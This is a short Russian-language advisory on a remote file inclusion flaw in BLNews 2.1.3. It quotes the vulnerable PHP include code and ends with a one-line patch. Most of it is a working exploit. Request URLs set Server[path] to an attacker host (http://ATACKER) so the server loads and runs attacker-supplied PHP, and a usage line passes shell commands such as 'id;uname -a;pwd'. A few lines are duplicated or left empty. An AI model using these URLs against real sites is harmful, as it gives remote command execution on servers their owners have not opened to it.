Уязвимость в BLNews версии 2.1.3 нашел Over G. Уязвимый скрипт admin/objects.inc.php4:

Over G. Уязвимый скрипт admin/objects.inc.php4:

if ($itheme!="blubb")
{ include("$Server[path]/admin/tools.inc.php4"); }
include("$Server[path]/admin/$Server[language_file]");

Разработчики забыли написать include("server.inc.php4") :)

Эксплоит:
admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4
вместе с
http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4

естественно с

используем: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;

Патч.
write before line if ($itheme!="blubb")
include("server.inc.php4");